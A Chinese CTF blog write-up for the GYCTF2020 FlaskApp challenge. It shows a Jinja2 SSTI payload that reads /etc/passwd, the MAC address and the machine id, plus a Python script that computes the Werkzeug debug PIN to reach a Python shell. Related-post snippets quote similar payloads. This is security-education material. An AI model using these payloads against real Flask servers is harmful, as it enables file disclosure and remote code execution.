[GYCTF2020]FlaskApp--Flask Debug PIN

最新推荐文章于 2024-05-09 22:21:26 发布
最新推荐文章于 2024-05-09 22:21:26 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: SSTI CTF 复现 文章标签: 安全 flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/121634781
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 3 订阅
订阅专栏
SSTI
8 篇文章 0 订阅
订阅专栏

一.前言

已经很久没有写文章了,最近快要到期末了,事情一天比一天多,没有时间做靶场的题目了。这篇文章想写很久了,事实上在一周前就已经用PIN码的方式做出来了这道题,但是一直没有时间来整理,今天下课来到图书馆翻开自己的截图记录就想着把它写出来算了。

二.正文

​​​​​​​​​​​​首先,打开题目,来看这个页面
在这里插入图片描述
测试的过程我就不说了,关键是要触发这个程序的报错,使其进入debug页面。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Cd0ERYCZ-1638344677443)(C:\Users\薛安\AppData\Roaming\Typora\typora-user-images\image-20211130161316605.png)]
我们尝试进入python shell但是flask的debug页面进入python shell是需要pin码的,所以这就带来一个问题,flask的pin码是怎么生成的?详情请大家来看https://zhuanlan.zhihu.com/p/32336971这篇文章,这篇文章说的很详细。
在这里插入图片描述
总之,这个pin码的生成取决于下面这几个因素:

1.服务器运行flask所登录的用户名。
2.modname
2.getattr(app, “name”, app.class.name)。
3.flask库下app.py的绝对路径。
4.当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address获得
5.最后一个就是机器的id。
其中modname就是flask.app,getattr(app, “name”, app.class.name)就是Flask这两个一般是不会变的,app.py的绝对路径我们可以直接从它的报错信息中得知。所以,一同分析下来我们只剩用户名,机器id,mac地址
我们在之前的文章中曾经做过这道题,这里面存在SSTI漏洞,我们可以通过SSTI漏洞来获取所有的组件,最后通过脚本生成PIN。
我们用下面的payload来读取用户名。

{% for c in [].__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read()}}{% endif %}{% endfor %}

请添加图片描述
其中的用户名是flaskweb。
我们用上面的payload稍加改动,将其中读文件的部分改成/sys/class/net/eth0/address,就可以读取机器的MAC地址了。
在这里插入图片描述
还剩下一个机器的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,而docker的id在/proc/self/cgroup,所以像上面那样改一下payload就能用。
在这里插入图片描述
我们用一下大佬写的脚本来生成payload。脚本来源

#!/usr/bin/python2.7
#coding:utf-8

from sys import *
import requests
import re
from itertools import chain
import hashlib

def genpin(mac,mid):

    probably_public_bits = [
        'flaskweb', # username
        'flask.app', # 一般为固定值modname
        'Flask', # getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
    ]
    mac = "0x"+mac.replace(":","")
    mac = int(mac,16)
    private_bits = [
        str(mac), # str(uuid.getnode()),  /sys/class/net/eth0/address
        str(mid) # get_machine_id(), /proc/sys/kernel/random/boot_id
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    num = None
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    rv =None
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                            for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    return rv

def getcode(content):
    try:
        return re.findall(r"<pre>([\s\S]*)</pre>",content)[0].split()[0]
    except:
        return ''
def getshell():
    print (genpin("02:42:ac:10:af:ca","b53170cd20be5202463fa5e0a54ea66fbeb1f2c058dcb09e105767cfc41acba4"))

if __name__ == '__main__':
    getshell()

运行结果如下
在这里插入图片描述
我们输入PIN码就可以用pythonshell了。
接下来就是执行命令了。
在这里插入图片描述
cat flag
在这里插入图片描述

后记

最近不知道为什么,我的笔记本在CSDN上传不了图片了,只能用台式机来写了,不知道是什么问题,希望以后能解决这个问题吧。

入山梵行
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
浅谈Flask Pin
mr_xioabai的博客
08-02 349
每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id,docker靶机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,在非docker环境下读取后两个,非docker环境三个都需要读取。通过uuid.getnode()读取,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算。将其十六进制转为十进制。
BUUCTF [GKCTF 2021]app-debug
weixin_53349587的博客
01-09 901
1.拿到文件,发现是一个app,直接ida查看有没有so文件,有so文件,打开: 找到主函数,通过分析,找到关键函数,打开: 里面是一个典型的tea加密,只不过delta的值变了,所以用findcrypto也查不出来是tea加密,其中的key值也是假的,程序通过TracerPid进行反调试,详情请参考:TracerPid反调试 - 简书,然后通过对key值的交叉引用,找到了TracerPid所在的函数: 对付这种反调试的方法是把TracerPid的值改为0,于是打开39行sub_3EF..
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1077
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
[GYCTF2020]FlaskApp1
最新发布
2303_77961060的博客
05-09 345
在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于。通过源代码的框架可以判断是FlaskFlask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造。的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.构造{{config}},先加密,再把加密结果解密,结果输出。
Werkzeug更新带来的Flask debug pin码生成方式改变
BlusKing
07-06 1283
前言: 首发在Freebuf:https://www.freebuf.com/articles/network/238485.html于2020.4月成稿,时隔3个月被发布,内容为flask debug pin码构造方式的改变。 正文: 复现2020GYCTF-FLASKAPP及 2019CISCN double_secret出现异常。题目本身有两个解题方式。其中一个思路是: 当Flask开启debug模式时,可以在报错页面输入pin码来执行python命令。 ...
[GYCTF2020]FlaskApp
Sk1y的博客
06-10 2079
知识点:flask框架开启debug模式产生的漏洞,PIN码的产生过程和文件读取,字符串拼接绕过,倒序绕过过滤。
浅谈flaskctf那些事
蚁景网安学院
08-21 2531
最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。debug pin本地先起一个开启debug模式的服务:# -...
Flask-2.2.2-py3-none-any.whl
02-04
该资源为Flask-2.2.2-py3-none-any.whl,欢迎下载使用哦!
flaskapp-Todo
03-16
4. `models.py`:如果项目涉及数据库操作,这里可能定义了数据模型,使用Flask-SQLAlchemy扩展来与数据库交互。 5. `requirements.txt`:列出项目依赖的Python库及其版本,方便其他开发者复现环境。 6. `config.py`...
flask-mysqldb:Flask Web框架MySQL扩展
02-05
Flask-MySQLdb Flask-MySQLdb为Flask提供MySQL连接。 快速开始 首先,安装Flask-MySQLdb: $ pip install flask-mysqldb Flask-MySQLdb依赖于并将为您安装Flask的最新版本(0.12.4或更高版本)和 。 Flask-MySQLdb...
flask-3.0.2-py3-none-any.whl
03-07
在压缩包子文件的文件名称列表中,我们看到有两个文件:flask-3.0.2-py3-none-any.whl.txt和flask-3.0.2-py3-none-any.whl。前者可能是关于这个wheel包的一些说明文档或者日志,后者则是实际的可安装包文件。通常,....
Flask框架Flask-Login用法分析
09-20
**Flask-Login是Flask框架的一个扩展,用于处理用户登录和身份验证。它提供了一套简单而强大的机制,帮助开发者轻松地管理用户会话。本文将深入探讨Flask-Login的基本用法、核心概念以及如何集成到Flask应用中。** ...
flask计算pin
weixin_63231007的博客
07-13 3682
python flask-pin码介绍 & CTFflask-pin码计算的应用
[GYCTF2020]FlaskApp 1(SSTI,PIN
weixin_45577185的博客
10-20 1240
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
web buuctf [GYCTF2020]FlaskApp
weixin_44214568的博客
04-12 4288
知识点:1.flaskdebug模式漏洞 2.flask字符拼接漏洞 1.开题 2.提示flask了,那不得不试一试SSTI 在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御 换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14 综上存在SSTI 3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...
GYCTF2020 FlaskApp
汗的博客
09-04 1701
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flask的SSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
exec flask --app b2c db upgrade
06-10
`flask` 是 Flask 应用程序的命令行工具,`--app b2c` 指定 Flask 应用程序的名称为 `b2c`,`db upgrade` 是 Flask-Migrate 提供的命令,用于执行数据库迁移。在执行 `db upgrade` 命令前,需要先配置 Flask-Migrate...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值